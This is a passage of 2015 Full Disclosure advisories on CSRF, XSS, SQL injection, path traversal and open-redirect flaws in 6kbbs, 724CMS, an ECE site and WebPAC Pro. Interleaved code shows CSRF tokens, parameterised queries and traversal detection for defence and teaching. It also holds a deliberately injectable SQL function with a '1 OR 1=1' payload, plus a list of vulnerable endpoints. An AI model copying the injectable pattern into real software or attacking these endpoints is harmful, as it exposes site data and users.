saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted Cookies,
Session, Application and other technical data cache on the forum, reducing
access to the database to improve the performance of the Forum. Can carry
more users simultaneously access; 3, the data points table function, reduce
the burden on the amount of data when accessing the database; 4, support
for multi-skin style switching function; 5, the use of RSS technology to
support subscriptions forum posts, recent posts, user's posts; 6, the
display frame mode + tablet mode, the user can choose according to their
own preferences to; 7. forum page optimization keyword search, so the forum
more easily indexed by search engines; 8, extension, for our friends to
provide a forum for a broad expansion of space services; 9, webmasters can
add different top and bottom of the ad, depending on the layout; 10, post
using HTML + UBB way the two editors, mutual conversion, compatible with
each other; ..."




*(2) Vulnerability Details:*
6kbbs web application has a security bug problem. It can be exploited by
CSRF (Cross-Site Request Forgery) attacks. This may allow an attacker to
trick the victim into clicking on the image to take advantage of the trust
relationship between the authenticated victim and the application. Such an
attack could trick the victim into creating files that may then be called
via a separate CSRF attack or possibly other means, and executed in the
context of their session with the application, without further prompting or
verification.

Several 0-day vulnerabilities in 6kbbs products have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. Open Sourced
Vulnerability Database (OSVDB) is an independent and open-sourced database.
The goal of the project is to provide accurate, detailed, current, and
unbiased technical information on security vulnerabilities. The project
promotes greater, open collaboration between companies and individuals. It
has published suggestions, advisories, solutions details related to 6kbbs
vulnerabilities.


*(2.1)* The first code programming flaw occurs at
"/portalchannel_ajax.php?" page with "&id" and "&code" parameters in HTTP
$POST.

*(2.2)* The second code programming flaw occurs at "/admin.php?" page with
"&fileids" parameter in HTTP $POST.






*References:*
http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
http://packetstormsecurity.com/files/authors/11270
http://www.osvdb.org/show/osvdb/105842
http://milw00rm.com/exploits/7889




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisc
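The advisory above describes CSRF against two POST handlers: an attacker's page trades on the trust between the authenticated victim and the application, and the server cannot tell a forged submission from a deliberate one. As an added illustration (not 6kbbs code and not part of the advisory), the block below shows the standard defence, a synchronizer token bound to both the session and the action with an HMAC, checked in constant time, plus an Origin check as a second gate. The session ids, server secret, action names and the /admin.php stand-in handler are constructed.

```python
"""Synchronizer-token CSRF protection for state-changing POST handlers.

Added example, not 6kbbs code. The page names only the endpoints
(/portalchannel_ajax.php with id and code, /admin.php with fileids) and that
the parameters travel in the POST body; the session ids, the server secret,
the action names and the handler below are constructed for illustration.
"""
import hashlib
import hmac
import secrets
from typing import List, Optional
from urllib.parse import parse_qs

SERVER_SECRET = secrets.token_bytes(32)      # constructed: per-deployment key, not in the repo
SITE_ORIGIN = "https://forum.example"        # constructed: the forum's own origin


class CsrfRejected(PermissionError):
    """The request cannot be tied to a deliberate action in this session."""


def make_token(session_id: str, action: str) -> str:
    """Token = HMAC-SHA256(secret, session_id || action). Binding to the
    session stops replay across users; binding to the action stops a token
    issued for one form from authorising a different endpoint."""
    msg = f"{session_id}\x00{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def token_valid(session_id: str, action: str, presented: str) -> bool:
    """Constant-time comparison; an empty or missing token is simply invalid."""
    if not presented:
        return False
    return hmac.compare_digest(make_token(session_id, action), presented)


def handle_admin_post(session_id: str, body: str, origin: Optional[str] = None) -> List[int]:
    """Constructed stand-in for the /admin.php action that takes 'fileids'.
    Returns the ids it would act on, or raises CsrfRejected.

    Gate 1: if the browser sent an Origin header it must be our own site
            (a form auto-submitted from another page carries a foreign Origin).
    Gate 2: the body must carry a token valid for this session and action;
            another site's page cannot read the victim's token, so it cannot
            supply this field even though it can supply every other one.
    """
    form = parse_qs(body, keep_blank_values=True)
    if origin is not None and origin != SITE_ORIGIN:
        raise CsrfRejected(f"cross-origin POST from {origin}")
    if not token_valid(session_id, "admin.fileids", form.get("csrf_token", [""])[0]):
        raise CsrfRejected("missing or invalid CSRF token")
    raw_ids = form.get("fileids", [""])[0]
    return [int(x) for x in raw_ids.split(",") if x.isascii() and x.isdigit()]


if __name__ == "__main__":
    sid = "sess-constructed-1"
    token = make_token(sid, "admin.fileids")      # embedded in the admin form the user is shown
    print(handle_admin_post(sid, f"fileids=3,7,9&csrf_token={token}", origin=SITE_ORIGIN))
    try:
        handle_admin_post(sid, "fileids=3,7,9", origin="https://other.example")
    except CsrfRejected as exc:
        print("rejected:", exc)
```

The token is the gate that actually closes the hole described in the advisory: a forged form can set id, code or fileids to anything, but it cannot include a value derived from the victim's session under a secret it does not hold. The Origin check is cheap defence in depth, not a replacement, since older browsers and some request types omit the header.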

[FD] ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-04 Thread Jing Wang
*ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: ECE Projects XSS (Cross-site Scripting) Security
Vulnerabilities
Vendor: ECE Projektmanagement G.m.b.H. & Co. KG (ECE)
Product: ECE Projects
Vulnerable Versions:
Tested Version:
Advisory Publication: April 01, 2015
Latest Update: April 01, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]




*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
ECE Projektmanagement G.m.b.H. & Co. KG (ECE)


*Product & Version:*
All Projects - Shopping & Office, Traffic, Industries, Hotel, Residential


*Vendor URL & download:*
ECE Projects can be obtained from here,
http://www.ece.com/en/projects/all-projects/


*Google Dork:*
ECE Projektmanagement GmbH & Co. KG


*Product Introduction Overview:*
"ECE develops, builds, and manages large commercial properties in the
business areas Shopping, Office, Traffic, and Industries. It was founded in
1965 by mail-order pioneer Prof. Werner Otto (1909-2011) and is owned by
the Otto family. Since 2000, the company founder's son, Alexander Otto, has
been heading the company. Hamburg-based ECE has been developing, building,
leasing out, and managing large commercial properties in the business areas
Shopping, Office, Traffic, and Industries and is European market leader in
the field of downtown shopping centers. For decades, ECE has been realizing
very successfully large group headquarters, office buildings, industrial
buildings, logistic centers, traffic-related properties, hotels and other
highly complex building types. ECE provides all real estate-related
services from one source and thus creates a major benefit for their
customers, clients and partners by pooling their complete know-how. With
regard to numerous projects the ECE group acts as investor and keeps the
projects in the portfolio for decades. Furthermore, two ECE funds
concentrate on the acquisition of shopping centers with value growth
potential. ECE is Europe-wide successfully positioned with numerous
subsidiaries and joint ventures."

"ECE employs specialists with in-depth knowledge of the retail trade and
all related "disciplines" and pools this wide-ranging expertise under one
roof. Our full-service concept extends from the original idea right through
to long-term management. Our credo: a full range of services from a single
provider who takes overall responsibility as opposed to a "coordinator".
This expertise is underpinned by several decades of experience in the
sector as well as the financial strength of the ECE Group and enables us to
cater to the full range of needs and requirements of our clients."



*(2) Vulnerability Details:*
ECE web application has a security bug problem. It can be exploited by XSS
attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 0-day vulnerabilities in ECE Projects products have been found by some
other bug hunter researchers before. ECE Projects patched some of them.
Open Sourced Vulnerability Database (OSVDB) is an independent and
open-sourced database. The goal of the project is to provide accurate,
detailed, current, and unbiased technical information on security
vulnerabilities. The project promotes greater, open collaboration between
companies and individuals. It has published suggestions, advisories,
solutions details related to XSS vulnerabilities.


*(2.1)* The first code programming flaw occurs at "suchergebnis/?"
page with "&tx_solr[q]" parameter.






*References:*
http://www.tetraph.com/security/xss-vulnerability/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/ece-projects-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
http://packetstormsecurity.com/files/authors/11717
http://www.osvdb.org/show/osvdb/119707




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Arc

[FD] 724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: 724CMS Multiple XSS (Cross-site Scripting) Security
Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 15, 2015
Latest Update: March 15, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]






*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01





*Vendor URL & download:*
724CMS can be purchased from here,
http://724cms.com/



*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows."






*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
XSS attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several vulnerabilities in 724CMS products have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has published suggestions,
advisories, solutions details related to 724CMS vulnerabilities.


*(2.1)* The first code programming flaw occurs at "/index.php" page with
"&Lang" parameter.

*(2.2)* The second code programming flaw occurs at "/section.php" page with
"&Lang", "&ID", "&Nav" parameters.








*References:*
http://www.tetraph.com/security/xss-vulnerability/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142576259903051&w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html
http://en.hackdig.com/?16117.htm






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] 724CMS 5.01 Multiple SQL Injection Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple SQL Injection Security Vulnerabilities*


Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01


*Vendor URL & download:*
724CMS can be obtained from here,
http://724cms.com/



*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows."


*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
SQL Injection attacks. This may allow an attacker to inject or manipulate
SQL queries in the back-end database, allowing for the manipulation or
disclosure of arbitrary data.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has phase, votes, comments and
proposed details related to 724CMS vulnerabilities.


*(2.1)* The first cipher programming flaw occurs at "/index.php" page with
"&Lang", "&ID" parameters.

*(2.2)* The second cipher programming flaw occurs at "/section.php" page
with "&Lang", "&ID" parameters.


*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://marc.info/?a=139222176300014&r=1&w=4
http://en.1337day.com/exploit/23308


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

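Added example, not part of the advisory above or of the 724CMS code: the section lookup the advisory describes (driven by the Lang and ID parameters) written once by string concatenation and once as a parameterised, validated query, run against a constructed in-memory table. The table, its rows and the language allow-list are assumptions.

```python
# Added example, not part of the 724CMS advisory or the 724CMS code base.
# It contrasts a query built by string concatenation with a parameterised
# query for a lookup driven by the Lang and ID request parameters named in
# the advisory. The table, rows and language list are constructed here.
import sqlite3

# Constructed sample data standing in for a CMS "sections" table.
SAMPLE_ROWS = [
    (1, "en", "Home"),
    (2, "en", "About"),
    (3, "de", "Startseite"),
]
KNOWN_LANGS = {"en", "de"}  # constructed allow-list of language codes


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sections (ID INTEGER, Lang TEXT, Title TEXT)")
    conn.executemany("INSERT INTO sections VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, lang: str, section_id: str) -> list:
    """The defective pattern: request values are pasted into the statement,
    so anything in them is parsed as SQL syntax."""
    sql = ("SELECT ID, Lang, Title FROM sections WHERE Lang = '" + lang
           + "' AND ID = " + section_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, lang: str, section_id: str) -> list:
    """Parameterised form: the driver passes the values separately from the
    statement text, so they can only ever be compared, never executed."""
    sql = "SELECT ID, Lang, Title FROM sections WHERE Lang = ? AND ID = ?"
    return conn.execute(sql, (lang, section_id)).fetchall()


def lookup_validated(conn: sqlite3.Connection, lang: str, section_id: str) -> list:
    """Parameterisation plus input validation: ID must be a decimal integer
    and Lang must be a known code, otherwise the request is rejected early."""
    if lang not in KNOWN_LANGS:
        raise ValueError("unknown Lang")
    if not section_id.isdigit():
        raise ValueError("ID must be numeric")
    return lookup_safe(conn, lang, int(section_id))


def rejects(conn: sqlite3.Connection, lang: str, section_id: str) -> bool:
    """True when lookup_validated refuses the request (used by the checks below)."""
    try:
        lookup_validated(conn, lang, section_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    crafted = "1 OR 1=1"  # the classic tautology: turns one lookup into a full dump
    print("concatenated:", lookup_vulnerable(db, "en", crafted))
    print("parameterised:", lookup_safe(db, "en", crafted))
    print("validated rejects:", rejects(db, "en", crafted))
```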


[FD] 724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities*


Exploit Title: 724CMS /section.php Module Parameter Directory Traversal
Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discover and Author: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]


*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01


*Vendor URL & download:*
724CMS can be bargained from here,
http://724cms.com/



*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows."


*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
Directory Traversal - Local File Include (LFI) attacks. A local file
inclusion (LFI) flaw is due to the script not properly sanitizing user
input, specifically path traversal style attacks (e.g. '../../') supplied
to the parameters. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote host. This
may allow disclosing file contents or executing files like PHP scripts.
Such attacks are limited due to the script only calling files already on
the target host.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has published suggestions,
advisories, solutions details related to 724CMS vulnerabilities.


*(2.1)* The first cipher programming flaw occurs at "/section.php" page
with "&Module" parameter.


*References:*
http://www.tetraph.com/security/directory-traversal-vulnerability/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-directory-path-traversal.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-directory-path-traversal-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://marc.info/?a=139222176300014&r=1&w=4
http://en.hackdig.com/wap/?id=17404


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

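Added example, not the 724CMS code: a loader for a request parameter like section.php's Module that cannot be steered outside its directory (identifier allow-list plus a realpath containment check), and a query-string check that flags '../' sequences even when they are double percent-encoded. The directory layout, module name and URLs are constructed assumptions.

```python
# Added example, not the 724CMS code base. It shows a module loader for a
# request parameter like section.php's Module that cannot be steered outside
# its directory, and a log check for traversal sequences in query strings.
# Directory layout and request URLs are constructed here.
import os
import re
import tempfile
from urllib.parse import parse_qs, unquote, urlsplit

MODULE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_module_path(modules_dir: str, module: str) -> str:
    """Return the absolute path of <modules_dir>/<module>.php.

    Raises ValueError when the name is not a plain identifier, when the
    resolved path leaves modules_dir, or when no such module exists."""
    if not MODULE_NAME.fullmatch(module):
        raise ValueError("invalid module name")  # no '/', '\\', '.', NUL
    base = os.path.realpath(modules_dir)
    candidate = os.path.realpath(os.path.join(base, module + ".php"))
    # realpath collapses '..' and follows symlinks; the result must stay under base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("module resolves outside the modules directory")
    if not os.path.isfile(candidate):
        raise ValueError("no such module")
    return candidate


def rejects(modules_dir: str, module: str) -> bool:
    """True when safe_module_path refuses the name (used by the checks below)."""
    try:
        safe_module_path(modules_dir, module)
    except ValueError:
        return True
    return False


def _suspicious(value: str) -> bool:
    return "../" in value or "..\\" in value or "\x00" in value


def has_traversal(url: str, max_decodes: int = 3) -> bool:
    """True if any query value contains a traversal sequence, checked after
    each of up to max_decodes extra percent-decoding rounds so that
    double-encoded forms such as %252e%252e%252f are caught too."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for values in query.values():
        for value in values:  # parse_qs has already decoded one round
            current = value
            for _ in range(max_decodes + 1):
                if _suspicious(current):
                    return True
                decoded = unquote(current)
                if decoded == current:
                    break
                current = decoded
    return False


def build_demo_tree() -> str:
    """Create a constructed layout <root>/modules/news.php and <root>/secret.txt
    and return the modules directory."""
    root = tempfile.mkdtemp(prefix="cms-demo-")
    modules = os.path.join(root, "modules")
    os.mkdir(modules)
    with open(os.path.join(modules, "news.php"), "w") as fh:
        fh.write("<?php echo 'news'; ?>\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("constructed secret\n")
    return modules
```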


[FD] 724CMS 5.01 Multiple Information Leakage Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple Information Leakage Security Vulnerabilities*



Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01


*Vendor URL & download:*
724CMS can be got from here,
http://724cms.com/



*Product Introduction Overview:*
724CMS is a content management system (CMS) that has large customers spread
in Canada, Japan, Korean, the United States and many others. It allows
publishing, editing and modifying content, organizing, deleting as well as
maintenance from a central interface. Meanwhile, 724CMS provides procedures
to manage workflow in a collaborative environment.


*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
information leakage attacks - Full Path Disclosure (FPD). This may allow a
remote attacker to disclose the software's installation path. While such
information is relatively low risk, it is often useful in carrying out
additional, more focused attacks.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. NVD is the U.S.
government repository of standards based vulnerability management data
(This data enables automation of vulnerability management, security
measurement, and compliance (e.g. FISMA)). It has published suggestions,
advisories, solutions related to 724CMS vulnerabilities.


*(2.1)* The first code programming flaw occurs at "index.php" page with
"&Lang", "&ID" parameters.

*(2.2)* The second code programming flaw occurs at "section.php" page with
"&Lang", "&ID" parameters.


*References:*
http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/
https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142576280203098&w=4
http://en.hackdig.com/wap/?id=17055


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious


[FD] Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL Redirection) Security Vulnerabilities

2015-03-16 Thread Jing Wang
*Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL
Redirection) Security Vulnerabilities*


Exploit Title: Innovative WebPAC Pro 2.0 /showres url parameter URL
Redirection Security Vulnerabilities
Vendor: Innovative Interfaces Inc
Product: WebPAC Pro
Vulnerable Versions: 2.0
Tested Version: 2.0
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Discover and Author: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]


*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Innovative Interfaces Inc


*Product & Version:*
WebPAC Pro
2.0


*Vendor URL & Download:*
WebPAC Pro can be got from here,
http://www.iii.com/products/webpac_pro.shtml
http://lj.libraryjournal.com/2005/12/ljarchives/innovative-releasing-webpac-pro/


*Libraries that have installed WebPac Pro:*
https://wiki.library.oregonstate.edu/confluence/display/WebOPAC/Libraries+that+have+installed+WebPac+Pro


*Product Introduction Overview:*
"Today, some libraries want to enhance their online presence in ways that
go beyond the traditional OPAC and the "library portal" model to better
integrate the latest Web functionality. With WebPAC Pro, libraries will be
able to take advantage of the latest Web technologies and engage Web-savvy
users more effectively than ever before. WebPAC Pro is a complete update of
the Web OPAC interface"

"WebPAC Pro breaks through the functional and design limitations of the
traditional online catalog. Its solid technology framework supports tools
for patron access such as Spell Check; integrated Really Simple Syndication
(RSS) feeds; a suite of products for seamless Campus Computing; and deep
control over information content and presentation with Cascading Style
Sheets (CSS). WebPAC Pro is also a platform for participation when
integrated with Innovative's Patron Ratings features and Community Reviews
product. What's more, with WebPAC Pro's RightResult™ search technology, the
most relevant materials display at the top so patrons get to the specific
items or topics they want to explore immediately. WebPAC Pro can also
interconnect with Innovative's discovery services platform, Encore. And for
elegant access through Blackberry® Storm™ or iPhone™, the AirPAC provides
catalog searching, item requesting, and more."


*(2) Vulnerability Details:*
WebPAC Pro web application has a security bug problem. It can be exploited
by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could
allow a user to create a specially crafted URL, that if clicked, would
redirect a victim from the intended legitimate web site to an arbitrary web
site of the attacker's choosing. Such attacks are useful as the crafted URL
initially appears to be a web page of a trusted site. This could be
leveraged to direct an unsuspecting user to a web page containing attacks
that target client side software such as a web browser or document
rendering programs.

Other Innovative Interfaces products vulnerabilities have been found by
some other bug hunter researchers before. Innovative has patched some of
them. NVD is the U.S. government repository of standards based
vulnerability management data (This data enables automation of
vulnerability management, security measurement, and compliance (e.g.
FISMA)). It has published suggestions, advisories, solutions related to
Innovative vulnerabilities.

*(2.1)* The first code programming flaw occurs at "showres?" page with
"&url" parameter.


*References:*
http://tetraph.com/security/open-redirect/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/innovative-webpac-pro-20-unvalidated.html
